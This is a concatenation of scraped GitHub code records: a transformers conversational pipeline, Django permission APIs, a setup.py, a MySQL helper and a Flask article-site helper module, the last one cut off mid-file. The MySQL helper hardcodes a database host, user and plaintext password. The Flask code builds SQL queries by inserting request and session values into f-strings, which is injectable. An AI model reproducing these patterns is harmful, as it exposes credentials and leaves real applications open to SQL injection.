int(2)\nprint(S)\n","repo_name":"eugene-okulik/QAP-08onl","sub_path":"homework/Anastasiya_Botukh/Homework_3/ex_4.py","file_name":"ex_4.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42295907558","text":"import uuid\nfrom typing import Any, Dict, List, Union\n\nfrom ..utils import add_end_docstrings, is_tf_available, is_torch_available, logging\nfrom .base import PIPELINE_INIT_ARGS, Pipeline\n\n\nif is_tf_available():\n import tensorflow as tf\n\nif is_torch_available():\n import torch\n\n\nlogger = logging.get_logger(__name__)\n\n\nclass Conversation:\n \"\"\"\n Utility class containing a conversation and its history. This class is meant to be used as an input to the\n [`ConversationalPipeline`]. The conversation contains several utility functions to manage the addition of new user\n inputs and generated model responses.\n\n Arguments:\n messages (Union[str, List[Dict[str, str]]], *optional*):\n The initial messages to start the conversation, either a string, or a list of dicts containing \"role\" and\n \"content\" keys. If a string is passed, it is interpreted as a single message with the \"user\" role.\n conversation_id (`uuid.UUID`, *optional*):\n Unique identifier for the conversation. If not provided, a random UUID4 id will be assigned to the\n conversation.\n\n Usage:\n\n ```python\n conversation = Conversation(\"Going to the movies tonight - any suggestions?\")\n conversation.add_message({\"role\": \"assistant\", \"content\": \"The Big lebowski.\"})\n conversation.add_message({\"role\": \"user\", \"content\": \"Is it good?\"})\n ```\"\"\"\n\n def __init__(\n self, messages: Union[str, List[Dict[str, str]]] = None, conversation_id: uuid.UUID = None, **deprecated_kwargs\n ):\n if not conversation_id:\n conversation_id = uuid.uuid4()\n\n if messages is None:\n text = deprecated_kwargs.pop(\"text\", None)\n if text is not None:\n messages = [{\"role\": \"user\", \"content\": text}]\n else:\n messages = []\n elif isinstance(messages, str):\n messages = [{\"role\": \"user\", \"content\": messages}]\n\n # This block deals with the legacy args - new code should just totally\n # avoid past_user_inputs and generated_responses\n generated_responses = deprecated_kwargs.pop(\"generated_responses\", None)\n past_user_inputs = deprecated_kwargs.pop(\"past_user_inputs\", None)\n if generated_responses is not None and past_user_inputs is None:\n raise ValueError(\"generated_responses cannot be passed without past_user_inputs!\")\n if past_user_inputs is not None:\n legacy_messages = []\n if generated_responses is None:\n generated_responses = []\n # We structure it this way instead of using zip() because the lengths may differ by 1\n for i in range(max([len(past_user_inputs), len(generated_responses)])):\n if i < len(past_user_inputs):\n legacy_messages.append({\"role\": \"user\", \"content\": past_user_inputs[i]})\n if i < len(generated_responses):\n legacy_messages.append({\"role\": \"assistant\", \"content\": generated_responses[i]})\n messages = legacy_messages + messages\n\n self.uuid = conversation_id\n self.messages = messages\n\n def __eq__(self, other):\n if not isinstance(other, Conversation):\n return False\n return self.uuid == other.uuid or self.messages == other.messages\n\n def add_message(self, message: Dict[str, str]):\n if not set(message.keys()) == {\"role\", \"content\"}:\n raise ValueError(\"Message should contain only 'role' and 'content' keys!\")\n if message[\"role\"] 
not in (\"user\", \"assistant\", \"system\"):\n raise ValueError(\"Only 'user', 'assistant' and 'system' roles are supported for now!\")\n self.messages.append(message)\n\n def add_user_input(self, text: str, overwrite: bool = False):\n \"\"\"\n Add a user input to the conversation for the next round. This is a legacy method that assumes that inputs must\n alternate user/assistant/user/assistant, and so will not add multiple user messages in succession. We recommend\n just using `add_message` with role \"user\" instead.\n \"\"\"\n if len(self) > 0 and self[-1][\"role\"] == \"user\":\n if overwrite:\n logger.warning(\n f'User input added while unprocessed input was existing: \"{self[-1][\"content\"]}\" was overwritten '\n f'with: \"{text}\".'\n )\n self[-1][\"content\"] = text\n else:\n logger.warning(\n f'User input added while unprocessed input was existing: \"{self[-1][\"content\"]}\" new input '\n f'ignored: \"{text}\". Set `overwrite` to True to overwrite unprocessed user input'\n )\n else:\n self.messages.append({\"role\": \"user\", \"content\": text})\n\n def append_response(self, response: str):\n \"\"\"\n This is a legacy method. We recommend just using `add_message` with an appropriate role instead.\n \"\"\"\n self.messages.append({\"role\": \"assistant\", \"content\": response})\n\n def mark_processed(self):\n \"\"\"\n This is a legacy method that no longer has any effect, as the Conversation no longer distinguishes between\n processed and unprocessed user input.\n \"\"\"\n pass\n\n def __iter__(self):\n for message in self.messages:\n yield message\n\n def __getitem__(self, item):\n return self.messages[item]\n\n def __setitem__(self, key, value):\n self.messages[key] = value\n\n def __len__(self):\n return len(self.messages)\n\n def __repr__(self):\n \"\"\"\n Generates a string representation of the conversation.\n\n Returns:\n `str`:\n\n Example:\n Conversation id: 7d15686b-dc94-49f2-9c4b-c9eac6a1f114 user: Going to the movies tonight - any suggestions?\n bot: The Big Lebowski\n \"\"\"\n output = f\"Conversation id: {self.uuid}\\n\"\n for message in self.messages:\n output += f\"{message['role']}: {message['content']}\\n\"\n return output\n\n def iter_texts(self):\n # This is a legacy method for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n for message in self.messages:\n yield message[\"role\"] == \"user\", message[\"content\"]\n\n @property\n def _user_messages(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return [message[\"content\"] for message in self.messages if message[\"role\"] == \"user\"]\n\n @property\n def past_user_inputs(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return self._user_messages[:-1]\n\n @property\n def generated_responses(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return [message[\"content\"] for message in self.messages if message[\"role\"] == \"assistant\"]\n\n @property\n def new_user_input(self):\n # This is a legacy property for backwards compatibility. 
It is recommended to just directly access\n # conversation.messages instead.\n return self._user_messages[-1]\n\n\n@add_end_docstrings(\n PIPELINE_INIT_ARGS,\n r\"\"\"\n min_length_for_response (`int`, *optional*, defaults to 32):\n The minimum length (in number of tokens) for a response.\n minimum_tokens (`int`, *optional*, defaults to 10):\n The minimum length of tokens to leave for a response.\n \"\"\",\n)\nclass ConversationalPipeline(Pipeline):\n \"\"\"\n Multi-turn conversational pipeline.\n\n Example:\n\n ```python\n >>> from transformers import pipeline, Conversation\n\n >>> chatbot = pipeline(model=\"microsoft/DialoGPT-medium\")\n >>> conversation = Conversation(\"Going to the movies tonight - any suggestions?\")\n >>> conversation = chatbot(conversation)\n >>> conversation.generated_responses[-1]\n 'The Big Lebowski'\n\n >>> conversation.add_user_input(\"Is it an action movie?\")\n >>> conversation = chatbot(conversation)\n >>> conversation.generated_responses[-1]\n \"It's a comedy.\"\n ```\n\n Learn more about the basics of using a pipeline in the [pipeline tutorial](../pipeline_tutorial)\n\n This conversational pipeline can currently be loaded from [`pipeline`] using the following task identifier:\n `\"conversational\"`.\n\n The models that this pipeline can use are models that have been fine-tuned on a multi-turn conversational task,\n currently: *'microsoft/DialoGPT-small'*, *'microsoft/DialoGPT-medium'*, *'microsoft/DialoGPT-large'*. See the\n up-to-date list of available models on\n [huggingface.co/models](https://huggingface.co/models?filter=conversational).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.tokenizer.pad_token_id is None:\n self.tokenizer.pad_token = self.tokenizer.eos_token\n\n def _sanitize_parameters(\n self, min_length_for_response=None, minimum_tokens=None, clean_up_tokenization_spaces=None, **generate_kwargs\n ):\n preprocess_params = {}\n forward_params = {}\n postprocess_params = {}\n\n if min_length_for_response is not None:\n preprocess_params[\"min_length_for_response\"] = min_length_for_response\n if minimum_tokens is not None:\n forward_params[\"minimum_tokens\"] = minimum_tokens\n\n if \"max_length\" in generate_kwargs:\n forward_params[\"max_length\"] = generate_kwargs[\"max_length\"]\n # self.max_length = generate_kwargs.get(\"max_length\", self.model.config.max_length)\n if clean_up_tokenization_spaces is not None:\n postprocess_params[\"clean_up_tokenization_spaces\"] = clean_up_tokenization_spaces\n\n if generate_kwargs:\n forward_params.update(generate_kwargs)\n return preprocess_params, forward_params, postprocess_params\n\n def __call__(self, conversations: Union[Conversation, List[Conversation]], num_workers=0, **kwargs):\n r\"\"\"\n Generate responses for the conversation(s) given as inputs.\n\n Args:\n conversations (a [`Conversation`] or a list of [`Conversation`]):\n Conversations to generate responses for.\n clean_up_tokenization_spaces (`bool`, *optional*, defaults to `False`):\n Whether or not to clean up the potential extra spaces in the text output.\n generate_kwargs:\n Additional keyword arguments to pass along to the generate method of the model (see the generate method\n corresponding to your framework [here](./model#generative-models)).\n\n Returns:\n [`Conversation`] or a list of [`Conversation`]: Conversation(s) with updated generated responses for those\n containing a new user input.\n \"\"\"\n # XXX: num_workers==0 is required to be backward compatible\n # Otherwise the 
threads will require a Conversation copy.\n # This will definitely hinder performance on GPU, but has to be opted\n # in because of this BC change.\n outputs = super().__call__(conversations, num_workers=num_workers, **kwargs)\n if isinstance(outputs, list) and len(outputs) == 1:\n return outputs[0]\n return outputs\n\n def preprocess(self, conversation: Conversation, min_length_for_response=32) -> Dict[str, Any]:\n input_ids = self.tokenizer.apply_chat_template(conversation, add_generation_prompt=True)\n\n if self.framework == \"pt\":\n input_ids = torch.LongTensor([input_ids])\n elif self.framework == \"tf\":\n input_ids = tf.constant([input_ids])\n return {\"input_ids\": input_ids, \"conversation\": conversation}\n\n def _forward(self, model_inputs, minimum_tokens=10, **generate_kwargs):\n max_length = generate_kwargs.get(\"max_length\", self.model.config.max_length)\n\n n = model_inputs[\"input_ids\"].shape[1]\n if max_length - minimum_tokens < n:\n logger.warning(\n f\"Conversation input is too long ({n}), trimming it to {max_length - minimum_tokens} tokens. Consider increasing `max_length` to avoid truncation.\"\n )\n trim = max_length - minimum_tokens\n model_inputs[\"input_ids\"] = model_inputs[\"input_ids\"][:, -trim:]\n if \"attention_mask\" in model_inputs:\n model_inputs[\"attention_mask\"] = model_inputs[\"attention_mask\"][:, -trim:]\n conversation = model_inputs.pop(\"conversation\")\n generate_kwargs[\"max_length\"] = max_length\n output_ids = self.model.generate(**model_inputs, **generate_kwargs)\n if self.model.config.is_encoder_decoder:\n start_position = 1\n else:\n start_position = n\n return {\"output_ids\": output_ids[:, start_position:], \"conversation\": conversation}\n\n def postprocess(self, model_outputs, clean_up_tokenization_spaces=True):\n output_ids = model_outputs[\"output_ids\"]\n answer = self.tokenizer.decode(\n output_ids[0],\n skip_special_tokens=True,\n clean_up_tokenization_spaces=clean_up_tokenization_spaces,\n )\n conversation = model_outputs[\"conversation\"]\n conversation.add_message({\"role\": \"assistant\", \"content\": answer})\n return conversation\n","repo_name":"Marker-Inc-Korea/KoNEFTune","sub_path":"kosy_transformers/pipelines/conversational.py","file_name":"conversational.py","file_ext":"py","file_size_in_byte":13582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72752228714","text":"from base.api import BaseApi\nfrom account.controllers import permission as permission_ctl\n\n\nclass CreatePermissionApi(BaseApi):\n\n need_params = {\n 'mod_id': ('模块ID', 'required int'),\n 'name': ('名称', 'required str 32'),\n 'sign': ('标识', 'required str 128'),\n 'typ': ('类型', 'required int'),\n 'rank': ('排序值', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.create_permission(**params)\n\n\nclass UpdatePermissionApi(BaseApi):\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n 'name': ('名称', 'required str 32'),\n 'sign': ('标识', 'required str 128'),\n 'typ': ('类型', 'required int'),\n 'rank': ('排序值', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.update_permission(**params)\n\n\nclass DeletePermissionApi(BaseApi):\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.delete_permission(**params)\n\n\nclass ListPermissionApi(BaseApi):\n NEED_PERMISSION = False\n\n need_params = {\n 'mod_id': ('模块ID', 'optional int'),\n 'typ': ('类型', 'optional int'),\n 'keyword': ('关键字', 
'optional str'),\n 'page_num': ('页码', 'optional int'),\n 'page_size': ('页容量', 'optional int'),\n }\n def get(self, request, params):\n data = permission_ctl.get_permissions(**params)\n return data\n\n\nclass PermissionApi(BaseApi):\n NEED_PERMISSION = False\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n }\n\n def get(self, request, params):\n data = permission_ctl.get_permission(**params)\n return data\n","repo_name":"bxxfighting/rurality","sub_path":"account/apis/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"27943722000","text":"import MySQLdb\nimport copy\nimport time\nimport sys \nimport traceback \nimport modules as mo\ng_conn = None\n#lock\n\n\ndef db_init():\n\t\tglobal g_conn\n\t\tret = None\n\t\tfor i in range(3):\n\t\t\t\ttry:\n\t\t\t\t\t\tmo.logger.info( \"[conn]%s_%s_%s_%s %d.\"%(\"192.168.12.19\",\"caiji\",\"()zk4DW{\",\"resource\",i) )\n\t\t\t\t\t\tg_conn=MySQLdb.connect(host=\"192.168.12.19\",user=\"caiji\",passwd=\"()zk4DW{\",db=\"resource\",port=3306,charset='utf8')\n\t\t\t\t\t\treturn True,None\n\t\t\t\texcept:\n\t\t\t\t\t\tret = str(sys.exc_info()) + \"; \" + str(traceback.format_exc()) \n\t\t\t\t\t\tmo.logger.error( ret )\n\t\t\t\t\t\t#time.sleep(1)\n\t\treturn False,ret\n\n\nclass DBOperation:\n\tdefault = \"default\"\n\tselect = \"select\"\n\tinsert = \"insert\"\n\n\n#@mo.time_calc\ndef db_exec(_sql, op=DBOperation.default):\n\t\tglobal g_conn\n\t\tstarttime = time.time()\n\t\tcount,rets = -1,None\n\t\tret = None\n\t\tis_w = (_sql.find(\"select \")!=0 or _sql.find(\"6s_trace\")!=0 or _sql.find(\"6s_wx_msg\")!=0)\n\t\tfor i in range(2):\n\t\t\t\t_cur = None\n\t\t\t\ttry:\n\t\t\t\t\t\t_cur = g_conn.cursor()\n\t\t\t\t\t\tcount=_cur.execute(_sql) \n\t\t\t\t\t\trets = _cur.fetchall()\n\t\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\t\trets = \"[sql error] retry.%d, %s, %s. [%s]\"%(i,str(sys.exc_info()),str(traceback.format_exc()),_sql )\n\t\t\t\t\t\tmo.logger.error( rets )\n\t\t\t\t\t\tdb_init()\n\t\t\t\tfinally:\n\t\t\t\t\t\tif _cur != None:\n\t\t\t\t\t\t\t\tret = _cur.lastrowid\n\t\t\t\t\t\t\t\t_cur.close()\n\t\t\t\t\t\t\t\tg_conn.commit()\n\t\t#mo.logger.info(\"[sql] %s %d %s. 
\"%(_sql,count,str(rets) ))\n\t\tendtime = time.time()\n\t\tif not \" 6s_trace\" in _sql and not \" 6s_wx_msg\" in _sql:\n\t\t\tif is_w:\n\t\t\t\tmo.logger.info(\"[sql_w] %s, count:%d, time:%.03f.\"%(_sql,count,float(endtime - starttime) ))\n\t\t\telse:\n\t\t\t\tmo.logger.info(\"[sql_r] %s, count:%d, time:%.03f.\"%(_sql,count,float(endtime - starttime) ))\n\t\tif op == DBOperation.insert:\n\t\t\treturn count,rets,ret\n\t\treturn count,rets\n\n\ndb_init()\n\n\n","repo_name":"linxuping/tools","sub_path":"python/aso_scrap/dbmgr.py","file_name":"dbmgr.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40388105756","text":"# -*- coding: utf-8 -*-\n\nimport pathlib\nfrom setuptools import setup\n\n\nROOT_DIR = pathlib.Path(__file__).parent\n\n\ndef get_version():\n about = {}\n ver_mod = ROOT_DIR / 'voicerecorder' / '_version.py'\n exec(ver_mod.read_text(), about)\n return about['__version__']\n\n\nsetup(\n name='VoiceRecorder',\n version=get_version(),\n packages=['voicerecorder'],\n url='',\n license='',\n author='Eugene Prilepin',\n author_email='',\n description='VoiceRecorder is a simple application for voice/audio record',\n install_requires=[\n 'PyQt5',\n 'tinydb',\n 'av',\n ],\n entry_points={\n 'gui_scripts': [\n 'voicerecorder = voicerecorder.__main__:main',\n ],\n 'console_scripts': [\n 'voicerecorder_console = voicerecorder.__main__:main',\n ],\n },\n)\n","repo_name":"espdev/VoiceRecorder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"28796745029","text":"import requests, psycopg2, cv2, datetime\nimport flask\n\nconn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n\ncursor = conn.cursor()\n\n#FOR SIGN IN AND SIGN UP\ndef stop_sessions():\n flask.session['user'] = None # session for user_id\n flask.session['fullname'] = None # session for user's fullname\n flask.session['role'] = None # session for user's roles\n flask.session['ban'] = None # session for user's ban status\n flask.session['article'] = None # session for name of latest openned article\n flask.session['article_id'] = None # session for id of latest openned article\n flask.session['title'] = None # session for title of latest oppend article\n return 0\n\ndef crypt_role(role):\n if role=='writer':\n role_id = 3\n elif role=='moderator':\n role_id = 2\n else:\n role_id = 5\n return role_id\n \ndef send_roles(records):\n roles = []\n for pair in records:\n roles.append(pair[1])\n return roles\n\ndef update_reviews(article_name, user_id, article_id, review, path):\n with open(path, \"r\") as file:\n lines = file.readlines()\n file.close()\n new_lines = []\n formed_id = str(user_id)\n for line in lines:\n wrong = 1\n for i in range(len(formed_id)):\n if line[i] == formed_id[i]:\n wrong = 0\n else:\n wrong = 1\n break\n if wrong == 0:\n new_lines += f\"{user_id}:{review}\\n\"\n else:\n new_lines += line\n text = form_article(new_lines)\n with open(path, \"w\") as file:\n file.write(text)\n file.close()\n return 0\n \n \n\n#CHECK\ndef authorization_check(validate_role, direction):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif user_roles[0] == 1 or user_roles[validate_role] == 1 or 
direction == 'home':\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n return flask.render_template(f\"{direction}.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_editors_check(article_id):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n else:\n user = flask.session.get('user')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user} and article_id={article_id}\")\n records = list(cursor.fetchall())\n if user_roles[0] == 1 or (user_roles[1] == 1 and records[0][2] == True):\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n return flask.render_template(\"editors.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_published(article_name):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif user_roles[0] == 1 or user_roles[1] == 1:\n #a - admin, m - moder, w - writer, r - reader;\n new_publish = f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article_name}' and isdeleted = {False}\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, no_article=1)\n else:\n article_id = records[0][0]\n title = records[0][2]\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n path = f\".\\\\articles\\\\{article_name}.txt\"\n text = form_text(path)\n if check[0][1] == 2:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title)\n elif check[0][1] == 3: \n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title, aprooved=1)\n elif check[0][1] == 4:\n return flask.render_template(\"a_published.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, text=text, title=title, denied=1) \n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_draft(article):\n roles = flask.session.get('role')\n ban = flask.session.get('ban')\n if roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n elif roles[0] == 1 or roles[2] == 1:\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article}'\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template('draft.html', no_article = 1)\n else:\n title = records[0][2]\n reason = records[0][3]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={records[0][0]} and user_id={flask.session.get('user')}\")\n recs = list(cursor.fetchall())\n if recs == []:\n return flask.redirect(flask.url_for('.workshop'))\n author = is_author(records[0][0], flask.session.get('user'))\n path = f\".\\\\articles\\\\{article}.txt\"\n text = form_text(path)\n new_publish = 
f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id='{records[0][0]}'\")\n records = list(cursor.fetchall())\n if records[0][1] == 1:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author)\n elif records[0][1] == 2:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, publish=1)\n elif records[0][1] == 3:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, aprooved=1)\n else:\n return flask.render_template('draft.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, text=text, title=title, author=author, reason=reason, denied=1)\n else:\n return flask.redirect(flask.url_for('.home'))\n\ndef authorization_check_article(article_name):\n ban = flask.session.get('ban')\n user_roles = flask.session.get('role')\n if user_roles == None:\n return flask.redirect(flask.url_for('.sign_in_start'))\n else:\n new_publish = f\"({check_writer_uploads()})\"\n cursor.execute(f\"SELECT * FROM public.article WHERE name='{article_name}' and isdeleted = {False} \")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, no_article=1)\n else:\n user_id = flask.session.get('user')\n article_id = records[0][0]\n flask.session['article_id'] = article_id\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n status_id = check[0][1]\n #checking if article is aprooved.\n if status_id != 3:\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id} and user_id={user_id}\")\n check = list(cursor.fetchall())\n if check != []:\n return flask.redirect(flask.url_for('.draft_start'))\n else:\n if status_id == 1:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, not_published=1)\n elif status_id == 2:\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, not_aprooved=1)\n else:\n desc = records[0][3]\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, denied=1, reason=desc)\n else:\n #here must be tags\n title = records[0][2]\n path = f\".\\\\articles\\\\{article_name}.txt\"\n text = form_text(path)\n topic = get_topic(article_id)\n rate = get_rating(article_id)\n user_review=review_check(user_id, article_id, article_name)\n cursor.execute(f\"UPDATE public.user_read SET isread={True} WHERE user_id={user_id} and article_id={article_id} and isread={False}\")\n conn.commit()\n return flask.render_template(\"article.html\", a = user_roles[0], m = user_roles[1], w = user_roles[2], ban = ban, new_publish=new_publish, article_name=article_name, title=title, text=text, rate=rate, user_rate=user_review[0], user_review=user_review[1], user_date=user_review[2])\n #path = f\".\\\\reviews\\\\{article_name}.txt\"\n #reviews = form_text(path)\n \n \ndef 
check_writer_uploads():\n cursor.execute(f\"SELECT * FROM public.article_status WHERE status_id=2\")\n records = list(cursor.fetchall())\n res = 0\n for i in records:\n res+=1\n return res\n\ndef review_check(user_id, article_id, article_name):\n cursor.execute(f\"SELECT * FROM public.rating WHERE user_id={user_id} and article_id={article_id} and isdeleted={False}\")\n records = list(cursor.fetchall())\n rate = None\n review = None\n date = None\n if records != []:\n rate = records[0][4]\n date = records[0][3]\n path = f\".\\\\reviews\\\\{article_name}.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n formed_id = str(user_id)\n for line in lines:\n wrong = 1\n for i in range(len(formed_id)):\n if line[i] == formed_id[i]:\n wrong = 0\n else:\n wrong = 1\n break\n if wrong == 0:\n review = line[len(formed_id)+1:]\n break\n return [rate, review, date]\n\ndef is_author(article_id, user_id):\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id='{article_id}' and user_id='{user_id}'\")\n records = list(cursor.fetchall())\n if records[0][2] == True:\n return 1\n else:\n return 0\n\n\"\"\"\ndef workshop_check(user_id, roles, no_article):\n new_publish = f\"({check_writer_uploads()})\"\n ban = flask.session.get('ban')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user_id}\")\n records = list(cursor.fetchall())\n if records == []:\n return flask.render_template('workshop.html', a = roles[0], m = roles[1], w = roles[2], new_publish=new_publish)\n else:\n first, second, third = None, None, None\n for i in range (len(records)-1, -1, -1):\n article_id = records[i][0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n recs = list(cursor.fetchall())\n if recs != []:\n if i == len(records)-1:\n first = recs[0][1]\n elif i == len(records)-2:\n second = recs[0][1]\n elif i == len(records)-3:\n third = recs[0][1]\n else: \n break\n else:\n break\n return flask.render_template('workshop.html', ban=ban, a=roles[0], m=roles[1], w=roles[2], new_publish=new_publish, no_article=no_article)\n\"\"\"\n\n\n#FORM\ndef form_text(path):\n check = 1\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n if path[2:10] == 'articles':\n return form_article(lines)\n #else:\n #return form_reviews(lines)\n\ndef form_article(lines):\n if lines == []:\n return None\n else:\n check = 1\n new_lines = \"\"\n for line in lines:\n if line != \"\\n\" or check == 1:\n new_lines += line\n check = 0\n else:\n check = 1\n #print(new_lines)\n return new_lines\n\ndef form_read_colums(article_id):\n cursor.execute(f\"SELECT * FROM public.users\")\n records = list(cursor.fetchall())\n for rec in records:\n cursor.execute(f\"INSERT INTO public.user_read (user_id, article_id, isread) VALUES ({rec[0]}, {article_id}, {False})\")\n conn.commit()\n return 0\n\n\"\"\"\ndef form_reviews(article_id):\n res = \"\"\n cursor.execute(f\"SELECT * FROM public.rating WHERE article_id={article_id} and isdeleted={False}\")\n rating = list(cursor.fetchall())\n if rating == []:\n return None\n else:\n for i in (len(rating)-1, 0, -1):\n cursor.execute(f\"SELECT * FROM public.users WHERE id={rating[i][1]} and isbanned={False}\")\n records = list(cursor.fetchall())\n username = records[0][1]\n fullname = records[0][3]\n\ndef build_html(direction):\n path = f\".\\\\templates\\\\{direction}.html\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n rem = 0\n res = \"\"\n for 
i in range (len(lines)):\n if rem == 0:\n res += lines[i]\n if lines[i] == \"\\t\\t\\t\\tvar myArray = [\\n\":\n rem = 1\n elif lines[i] == \"\\t\\t\\t\\t]\\n\":\n if direction == 'home':\n res += select_table_desc() + lines[i]\n else:\n res += select_table_published() + lines[i]\n rem = 0\n with open(path, \"w\") as file:\n file.write(res)\n file.close()\n return 0\n\"\"\"\n#GET\ndef get_topic(article_id):\n cursor.execute(f\"SELECT * FROM public.article_topic WHERE article_id={article_id}\")\n article_desc = list(cursor.fetchall())\n cursor.execute(f\"SELECT * FROM public.topic WHERE id={article_desc[0][1]}\")\n topic_desc = list(cursor.fetchall())\n topic = topic_desc[0][1]\n return topic\n\ndef get_rating(article_id):\n cursor.execute(f\"SELECT * FROM public.rating WHERE article_id={article_id} and isdeleted={False}\")\n rating_desc = list(cursor.fetchall())\n count = 0\n for log in rating_desc:\n count += log[4]\n if count!=0:\n reviews = round(count/len(rating_desc), 1)\n else:\n reviews = 0\n return reviews\n\ndef get_current_date():\n time = str(datetime.datetime.now())\n time = time[0:10]\n res = \"\"\n for char in time:\n if char != \"-\":\n res += char\n else:\n res += '.'\n return res\n\n\n#SELECT\ndef select_role(roles):\n res = [0, 0, 0, 0]\n for role in roles:\n if role == 1:\n res[0]=1\n elif role == 2:\n res[1]=1\n elif role == 3:\n res[2]=1\n elif role == 4:\n res[3]=1\n return res\n\ndef select_table_desc():\n cursor.execute(f\"SELECT * FROM public.article WHERE isdeleted={False}\")\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n name = rec[1]\n date = rec[5]\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n if check[0][1] == 3:\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n article_desc = list(cursor.fetchall())\n authors = \"\"\n for log in article_desc:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = get_rating(article_id)\n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check)\n array += {'name':name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_table_published():\n cursor.execute(f\"SELECT * FROM public.article_status WHERE status_id={2}\")\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n article_desc = 